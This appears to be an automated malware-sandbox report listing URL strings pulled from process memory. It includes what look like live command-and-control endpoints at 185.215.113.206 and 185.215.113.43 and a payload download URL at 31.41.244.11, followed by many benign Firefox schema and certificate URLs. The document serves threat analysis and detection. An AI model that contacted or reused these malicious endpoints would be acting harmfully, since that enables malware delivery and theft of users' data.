Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php)
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/-
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUser
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phper
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpinit.exe
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/k
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.2062cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672ension
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.20668b591d6548ec281/sqlite3.dllm-data;
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206Local
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206LocalGoogle
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206LocalMicrosoft
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206Roaming
Source: 2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
Source: skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/G
Source: skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
Source: skotes.exe, 00000006.00000002.2954528432.0000000001199000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3375001
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedG
Source: skotes.exe, 00000006.00000002.2954528432.0000000001156000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/5131681669/4ZAAIhb.exe
Source: skotes.exe, 00000006.00000002.2954528432.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/5131681669/4ZAAIhb.exeswsock.dllJ
Source: skotes.exe, 00000006.00000002.2954528432.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/5131681669/4ZAAIhb.exev
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 0000000E.00000002.2614464083.0000028D23748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000E.00000002.2582397946.0000028D095E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA2A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2920221170.0000019D00816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8B26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922045046.0000019D00A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2807738714.0000019CFF8C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000022.00000002.2918649954.0000019CFFE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8B26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.2891150396.0000019CFD403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#Instance
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#showUpdateAvailableNotification/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934380843.00001F3F75E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGatehttp://mozilla.org/#/properties/autoFillAdaptiveHis
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/appNamehttp://mozilla.org/#/properties/outcomesresource://gre/module
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/isBestMatchExperimen
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/valuehttp://moz
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featurehttp://mozilla.org/#/proper
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsJEXL
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsc
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemscd09ae95-e2cf-4b8b-8
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/featuresurlclassifier.features.ema
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/branches/anyOf/1awes
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/counthttp://mozilla.org/#/properties/branche
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespacehttp://mozilla.org/#/properties/bra
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnithttp://mozilla.org/#/proper
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/starthttp://mozilla.org/#/properties/outcome
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfighttp://mozilla.org/#/properties/branches/anyOf/2http://m
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/exposureResultshttp://mozilla.org/#/additionalPropertiesresource://n
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/startDatehttp://mozi
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalPropertieshttps
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGateresource://normandy/lib/NormandyApi.sys.mjshttp://mozi
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEnabledbrowser.safebrowsing.features.malware.updatehttp://mozi
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
